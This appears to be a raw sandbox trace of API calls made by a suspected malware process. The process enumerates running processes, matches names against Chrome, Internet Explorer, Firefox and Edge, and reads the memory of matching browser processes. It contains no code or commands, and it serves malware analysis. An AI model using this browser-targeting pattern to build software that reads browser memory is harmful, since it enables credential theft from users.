	[0236.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.358] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0236.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.359] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.359] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0236.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.360] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.360] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0236.361] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x7808
	[0236.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.361] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0236.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.361] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.362] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0236.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.363] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.363] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0236.364] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x780c
	[0236.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.364] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0236.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.364] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.365] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0236.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.365] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.366] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0236.366] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x7810
	[0236.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.366] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0236.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.367] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.368] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0236.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.368] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.369] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0236.370] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x7814
	[0236.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.370] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0236.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.370] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.371] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0236.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.371] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.384] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0236.385] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x7818
	[0236.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.385] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0236.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.386] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0236.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.386] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0236.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.386] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.386] NtQueryInformationProcess (in: ProcessHandle=0x7818, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0236.386] ReadProcessMemory (in: hProcess=0x7818, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0236.386] ReadProcessMemory (in: hProcess=0x7818, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0236.387] ReadProcessMemory (in: hProcess=0x7818, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0236.387] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0236.387] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0236.388] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x781c
	[0236.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.388] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0236.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.388] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0236.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.389] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0236.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.389] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.389] NtQueryInformationProcess (in: ProcessHandle=0x781c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0236.389] ReadProcessMemory (in: hProcess=0x781c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0236.389] ReadProcessMemory (in: hProcess=0x781c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0236.390] ReadProcessMemory (in: hProcess=0x781c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0236.390] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0236.390] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0236.391] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x7820
	[0236.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.391] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0236.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.391] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.392] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0236.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.392] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.392] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0236.393] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x7824
	[0236.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.393] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0236.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.393] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.394] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0236.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.394] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.394] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.395] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x7828
	[0236.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.395] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.396] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.396] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.396] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.397] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.397] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.398] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x782c
	[0236.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.398] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.399] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.399] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.400] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.400] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.401] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x7830
	[0236.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.401] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.401] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.401] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.402] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.402] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0236.404] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x7834
	[0236.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.404] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0236.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.404] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.405] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0236.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.405] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.405] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.406] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x7838
	[0236.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.406] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.407] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.407] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.408] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.408] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0236.408] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x783c
	[0236.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.409] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0236.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.409] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.409] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0236.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.410] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.410] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0236.411] CloseHandle (hObject=0x4fd0) returned 1
	[0236.411] Sleep (dwMilliseconds=0x64) 
	[0236.513] GetCurrentProcessId () returned 0x110
	[0236.513] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0236.517] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0236.519] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0236.520] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0236.522] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x7840
	[0236.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.522] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0236.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.522] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.523] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0236.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.524] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.524] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0236.525] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x7844
	[0236.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.526] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0236.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.526] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.526] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0236.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.527] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.527] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0236.527] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x7848
	[0236.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.528] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0236.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.528] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.529] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0236.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.529] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.529] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0236.530] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x784c
	[0236.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.530] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0236.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.530] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.531] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0236.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.531] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.531] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0236.532] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x7850
	[0236.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.532] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0236.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.532] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.533] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0236.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.533] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.533] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0236.534] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x7854
	[0236.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.534] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0236.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.535] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.535] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0236.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.535] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0236.536] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0236.536] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x7858
	[0236.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.537] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0236.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.537] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0236.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0236.537] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
